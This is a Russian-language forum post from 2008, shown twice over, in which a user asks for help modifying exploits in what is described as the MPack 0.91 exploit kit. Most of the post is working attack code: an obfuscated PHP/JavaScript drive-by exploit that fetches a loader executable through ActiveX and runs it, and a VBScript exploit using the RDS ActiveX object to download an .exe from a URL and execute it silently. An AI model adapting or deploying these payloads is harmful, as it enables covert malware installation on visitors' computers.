satana8920
02.11.2008, 19:37
Помогите плизз переделать эксплойт вот из этого
это кстати сплойт из связки Мпак0.91
(знаю я орхеолог)
<?
include 'crypt.php';
$SPL="<script language='jav"."ascript'>var xd=\"var x = new Activ"."eXObject('Mic'+'r"."os'+'oft.X'+'MLHT"."TP');x.Ope"."n('GE"."T','".$LoaderPath."',0);x.Send();var s=new Acti"."veXOb"."ject('AD"."ODB.Str"."eam');s.Mode = 3;s.Type = 1;s.Open();s.W"."rite(x."."respon"."seBody);s.Save"."ToFile('../tm".".ex"."e',2); \";";
$SPL.="ed = escape(xd);";
$SPL.="var url = 're"."s:/"."/mmc"."ndmgr.d"."ll/pr"."evsym"."12.htm"."#%29%3"."B%3C/sty"."le%3E%3Cscript%20language%3D%27jscript%27%3Ea%3Dne w%20Activ"."eXObj"."ect%28%27Shell.Application%27%29%3B'+ed+'a.ShellEx ecute%28%27../t"."m.e"."xe%27%2"."9%3B%3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';";
$SPL.="docume"."nt.loca"."tion = url;</script>";
//$sOut = "document.write( unescape('%0A%3C%73%63%72%69%70%74%3E%66%75%6E%63% 74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31 %3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%7 4%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29% 3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D %30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2 B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43% 68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F %64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%2 8%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64% 6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65 %73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%6 9%70%74%3E')); dF('".encodezTxt($SPL)."');";
//$sOut = "<Script Language='JavaScript'>".$sOut."</Script>"; // [\\'\">]
//echo $SPL;
//$SPL=$sOut;
//$sOut = "document.write( unescape('%0A%3C%73%63%72%69%70%74%3E%66%75%6E%63% 74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31 %3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%7 4%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29% 3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D %30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2 B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43% 68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F %64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%2 8%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64% 6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65 %73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%6 9%70%74%3E')); dF('".encodezTxt($SPL)."');";
//$sOut = "<Script Language='JavaScript'>".$sOut."</Script>"; // [\\'\">]
echo $SPL;
?>
хочу вместо этого сплойта вот это например
<SCRIPT language="VBScript">
Module_Path="http://путь до файла.exe"
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0 Then
Const ssfFONTS=20
Const adModeReadWrite=3
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim oRDS
Dim oXMLHTTP
Dim oFSO
Dim oStream
Dim oWShell
Dim oShellApp
Dim WinDir
Dim ExeName
Dim XMLBody
Dim PluginFile
Dim cByte
Dim ObjName
Dim ObjProg
Randomize
ExeName=GenerateName()
ExeName=ExeName & ".exe"
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
Set oRDS=document.createElement("object")
oRDS.setAttribute "id","oRDS"
oRDS.setAttribute "classid",clsfull
Set oShellApp = oRDS.CreateObject("Shell.Application","")
Set oFolder = oShellApp.NameSpace(ssfFONTS)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
ExeName=WinDir & ExeName
ObjName="Microsoft"
ObjProg="XMLHTTP"
set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)
Req_type="G" & "E" & "T"
HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
oXMLHTTP.Send()
On Error Resume Next
XMLBody=oXMLHTTP.responseBody
ObjName="ADODB"
ObjProg="Stream"
On Error Resume Next
Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")
If Err.number <> 0 Then
Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")
Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)
Plugin_size=LenB(XMLBody)
For j=1 To Plugin_size
cByte=MidB(XMLBody,j,1)
ByteCode=AscB(cByte)
PluginFile.Write(Chr(ByteCode))
Next
PluginFile.Close
Set oWShell=oRDS.CreateObject("WScript.Shell","")
On Error Resume Next
oWShell.Run (ExeName),1,FALSE
Else
oStream.Mode=adModeReadWrite
oStream.Type=adTypeBinary
oStream.Open
oStream.Write XMLBody
oStream.SaveToFile ExeName,adSaveCreateOverWrite
oShellApp.ShellExecute ExeName
End If
End If
End If
Function GenerateName()
RandomName=""
rr=Int(8*Rnd)
ik=0
Do
ii=Int(25*Rnd)+97
RandomName=RandomName+Chr(ii)
ik=ik+1
Loop While ik<rr
GenerateName=RandomName
End Function
</SCRIPT>
как это реализовать ??? (в проэкте много сплойтов для модерниации)
еси кто поможет отблагодарю репой
это кстати сплойт из связки Мпак0.91
(знаю я орхеолог)
<?
include 'crypt.php';
$SPL="<script language='jav"."ascript'>var xd=\"var x = new Activ"."eXObject('Mic'+'r"."os'+'oft.X'+'MLHT"."TP');x.Ope"."n('GE"."T','".$LoaderPath."',0);x.Send();var s=new Acti"."veXOb"."ject('AD"."ODB.Str"."eam');s.Mode = 3;s.Type = 1;s.Open();s.W"."rite(x."."respon"."seBody);s.Save"."ToFile('../tm".".ex"."e',2); \";";
$SPL.="ed = escape(xd);";
$SPL.="var url = 're"."s:/"."/mmc"."ndmgr.d"."ll/pr"."evsym"."12.htm"."#%29%3"."B%3C/sty"."le%3E%3Cscript%20language%3D%27jscript%27%3Ea%3Dne w%20Activ"."eXObj"."ect%28%27Shell.Application%27%29%3B'+ed+'a.ShellEx ecute%28%27../t"."m.e"."xe%27%2"."9%3B%3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';";
$SPL.="docume"."nt.loca"."tion = url;</script>";
//$sOut = "document.write( unescape('%0A%3C%73%63%72%69%70%74%3E%66%75%6E%63% 74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31 %3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%7 4%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29% 3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D %30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2 B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43% 68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F %64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%2 8%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64% 6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65 %73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%6 9%70%74%3E')); dF('".encodezTxt($SPL)."');";
//$sOut = "<Script Language='JavaScript'>".$sOut."</Script>"; // [\\'\">]
//echo $SPL;
//$SPL=$sOut;
//$sOut = "document.write( unescape('%0A%3C%73%63%72%69%70%74%3E%66%75%6E%63% 74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31 %3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%7 4%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29% 3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D %30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2 B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43% 68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F %64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%2 8%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64% 6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65 %73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%6 9%70%74%3E')); dF('".encodezTxt($SPL)."');";
//$sOut = "<Script Language='JavaScript'>".$sOut."</Script>"; // [\\'\">]
echo $SPL;
?>
хочу вместо этого сплойта вот это например
<SCRIPT language="VBScript">
Module_Path="http://путь до файла.exe"
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0 Then
Const ssfFONTS=20
Const adModeReadWrite=3
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim oRDS
Dim oXMLHTTP
Dim oFSO
Dim oStream
Dim oWShell
Dim oShellApp
Dim WinDir
Dim ExeName
Dim XMLBody
Dim PluginFile
Dim cByte
Dim ObjName
Dim ObjProg
Randomize
ExeName=GenerateName()
ExeName=ExeName & ".exe"
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
Set oRDS=document.createElement("object")
oRDS.setAttribute "id","oRDS"
oRDS.setAttribute "classid",clsfull
Set oShellApp = oRDS.CreateObject("Shell.Application","")
Set oFolder = oShellApp.NameSpace(ssfFONTS)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
ExeName=WinDir & ExeName
ObjName="Microsoft"
ObjProg="XMLHTTP"
set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)
Req_type="G" & "E" & "T"
HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
oXMLHTTP.Send()
On Error Resume Next
XMLBody=oXMLHTTP.responseBody
ObjName="ADODB"
ObjProg="Stream"
On Error Resume Next
Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")
If Err.number <> 0 Then
Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")
Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)
Plugin_size=LenB(XMLBody)
For j=1 To Plugin_size
cByte=MidB(XMLBody,j,1)
ByteCode=AscB(cByte)
PluginFile.Write(Chr(ByteCode))
Next
PluginFile.Close
Set oWShell=oRDS.CreateObject("WScript.Shell","")
On Error Resume Next
oWShell.Run (ExeName),1,FALSE
Else
oStream.Mode=adModeReadWrite
oStream.Type=adTypeBinary
oStream.Open
oStream.Write XMLBody
oStream.SaveToFile ExeName,adSaveCreateOverWrite
oShellApp.ShellExecute ExeName
End If
End If
End If
Function GenerateName()
RandomName=""
rr=Int(8*Rnd)
ik=0
Do
ii=Int(25*Rnd)+97
RandomName=RandomName+Chr(ii)
ik=ik+1
Loop While ik<rr
GenerateName=RandomName
End Function
</SCRIPT>
как это реализовать ??? (в проэкте много сплойтов для модерниации)
еси кто поможет отблагодарю репой